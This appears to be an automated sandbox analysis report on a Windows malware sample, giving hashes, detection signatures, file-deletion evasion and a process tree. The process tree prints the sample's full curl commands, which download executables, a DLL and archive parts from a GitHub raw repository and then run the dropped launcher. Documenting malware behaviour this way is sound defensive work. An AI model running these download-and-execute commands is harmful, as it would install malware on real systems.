Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
23/08/2024, 13:37
Static task
static1
2 signatures
Behavioral task
behavioral1
Sample
2d3384ff117bd91e1d2efda9deede540N.exe
Resource
win7-20240704-en
windows7-x64
2 signatures
120 seconds
Behavioral task
behavioral2
Sample
2d3384ff117bd91e1d2efda9deede540N.exe
Resource
win10v2004-20240802-en
windows10-2004-x64
8 signatures
120 seconds
General
-
Target
2d3384ff117bd91e1d2efda9deede540N.exe
-
Size
1.2MB
-
MD5
2d3384ff117bd91e1d2efda9deede540
-
SHA1
155a7f799c3442da467754c95ef2524d5a6969b1
-
SHA256
0c53c6891733c2e3c70baf93e4da635aa25cc18b984ef619cbcc2d7c8960079f
-
SHA512
6a07a17f508425b7bcd10f16242ee3e3ab8ec5e553cfb72fef3e450bd66dae20de8b7dac2a204d233bf463e36e430bc9f1f593fb12938d8d0eb3f3c9369dec7d
-
SSDEEP
24576:ErORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaZZlMF4:E2EYTb8atv1orq+pEiSDTj1VyvBa1M
Score
8/10
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 4208 RewAdIs_Launcher_v08.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 15 raw.githubusercontent.com 26 raw.githubusercontent.com 27 raw.githubusercontent.com 33 raw.githubusercontent.com 3 raw.githubusercontent.com 4 raw.githubusercontent.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000e0000000233df-7.dat autoit_exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe 4208 RewAdIs_Launcher_v08.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 1392 wrote to memory of 3080 1392 2d3384ff117bd91e1d2efda9deede540N.exe 84 PID 1392 wrote to memory of 3080 1392 2d3384ff117bd91e1d2efda9deede540N.exe 84 PID 3080 wrote to memory of 4384 3080 cmd.exe 86 PID 3080 wrote to memory of 4384 3080 cmd.exe 86 PID 1392 wrote to memory of 3144 1392 2d3384ff117bd91e1d2efda9deede540N.exe 90 PID 1392 wrote to memory of 3144 1392 2d3384ff117bd91e1d2efda9deede540N.exe 90 PID 1392 wrote to memory of 5064 1392 2d3384ff117bd91e1d2efda9deede540N.exe 92 PID 1392 wrote to memory of 5064 1392 2d3384ff117bd91e1d2efda9deede540N.exe 92 PID 1392 wrote to memory of 5016 1392 2d3384ff117bd91e1d2efda9deede540N.exe 94 PID 1392 wrote to memory of 5016 1392 2d3384ff117bd91e1d2efda9deede540N.exe 94 PID 5016 wrote to memory of 3484 5016 cmd.exe 96 PID 5016 wrote to memory of 3484 5016 cmd.exe 96 PID 1392 wrote to memory of 4820 1392 2d3384ff117bd91e1d2efda9deede540N.exe 98 PID 1392 wrote to memory of 4820 1392 2d3384ff117bd91e1d2efda9deede540N.exe 98 PID 4820 wrote to memory of 4208 4820 cmd.exe 100 PID 4820 wrote to memory of 4208 4820 cmd.exe 100 PID 4208 wrote to memory of 4832 4208 RewAdIs_Launcher_v08.exe 101 PID 4208 wrote to memory of 4832 4208 RewAdIs_Launcher_v08.exe 101 PID 4832 wrote to memory of 4744 4832 cmd.exe 103 PID 4832 wrote to memory of 4744 4832 cmd.exe 103 PID 4208 wrote to memory of 5092 4208 RewAdIs_Launcher_v08.exe 104 PID 4208 wrote to memory of 5092 4208 RewAdIs_Launcher_v08.exe 104 PID 4208 wrote to memory of 3968 4208 RewAdIs_Launcher_v08.exe 106 PID 4208 wrote to memory of 3968 4208 RewAdIs_Launcher_v08.exe 106 PID 4208 wrote to memory of 4556 4208 RewAdIs_Launcher_v08.exe 108 PID 4208 wrote to memory of 4556 4208 RewAdIs_Launcher_v08.exe 108 PID 4556 wrote to memory of 2680 4556 cmd.exe 112 PID 4556 wrote to memory of 2680 4556 cmd.exe 112 PID 4208 wrote to memory of 5048 4208 RewAdIs_Launcher_v08.exe 118 PID 4208 wrote to memory of 5048 4208 RewAdIs_Launcher_v08.exe 118 PID 5048 wrote to memory of 1792 5048 cmd.exe 120 PID 5048 wrote to memory of 1792 5048 cmd.exe 120
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d3384ff117bd91e1d2efda9deede540N.exe"C:\Users\Admin\AppData\Local\Temp\2d3384ff117bd91e1d2efda9deede540N.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx2⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\system32\curl.execurl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx3⤵PID:4384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del ndx2⤵PID:3144
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del2⤵PID:5064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/RewAdIs_Launcher_v08.exe --ssl-no-revoke -o RewAdIs_Launcher_v08.exe2⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\system32\curl.execurl https://raw.githubusercontent.com/TROguz/ndx/main/RewAdIs_Launcher_v08.exe --ssl-no-revoke -o RewAdIs_Launcher_v08.exe3⤵PID:3484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c RewAdIs_Launcher_v08.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Users\Admin\AppData\Local\Temp\RewAdIs_Launcher_v08.exeRewAdIs_Launcher_v08.exe3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx4⤵
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\system32\curl.execurl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx5⤵PID:4744
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del ndx4⤵PID:5092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del 2d3384ff117bd91e1d2efda9deede540N.exe4⤵PID:3968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/z.exe,main/z.dll}4⤵
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\system32\curl.execurl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/z.exe,main/z.dll}5⤵PID:2680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/ISKA.7z.001,main/ISKA.7z.002}4⤵
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\system32\curl.execurl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/ISKA.7z.001,main/ISKA.7z.002}5⤵PID:1792
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
63B
MD5b57cd2f14edb7fe9e984e27c204f76a5
SHA1e949c42c36539e2cce8a1ea55ed094b345fcfee6
SHA25607ff7e593852214d9a284a4434cda9e0b63bb32f966657948395d04f8143b5e5
SHA512a78245e3c68dfa68598955516214a5cc64976f6f902f0dd768c26c2d860e7cb139b34bb7d1117d89c1a51b59ffc3175b3077f32821ac35320a5175228a147c49
-
Filesize
27KB
MD5494eff8bdaa7322ad7ecf159d8feede1
SHA1ceaacc7452d910065af126872a091efe93e88b1d
SHA256fc27524bb6f93c05f3d5e161794f3732d1411c6150c143c2abeb1485208a46a5
SHA5124f4f1299232a452df3205cdf98aa0e77c9fd0f77be57175b18a2abbe78dec4efb386b6c10e0d55f66dad81c1a1472d67e3156260ff85edca158814961b3af095
-
Filesize
2B
MD588dba0c4e2af76447df43d1e31331a3d
SHA136f780fdbda5b2b2ce85c9ebb57086d1880ae757
SHA25621d017c40a91c15748f0b98cd826ba445d2d3fe227e310bfd58dcb6c431826a0
SHA5124c34894f42b47ee156997e54e03425f820a3aad6fe8c863d4a07b57c168e846db1a31d1230cec16643b9f1219c38e91331558842dd24a142fee381e465b751ce
-
Filesize
1.3MB
MD5ad28c9e121bc41ccc97abf25b9f3fd6a
SHA19f5ee915a6fb5adec222ac7d8e61f56d63f9d7c6
SHA256d09687fc091b741211f3f9341efd189f1277036f86de1b68d8823eb701da6022
SHA51259395025683308a623114b75bf642179335d24de22b94aa4dc89feabb88b70ebb2fc794c6c7f43c3d4fe0ba7f42f29c954c22048b07180c90cb54c88921240b5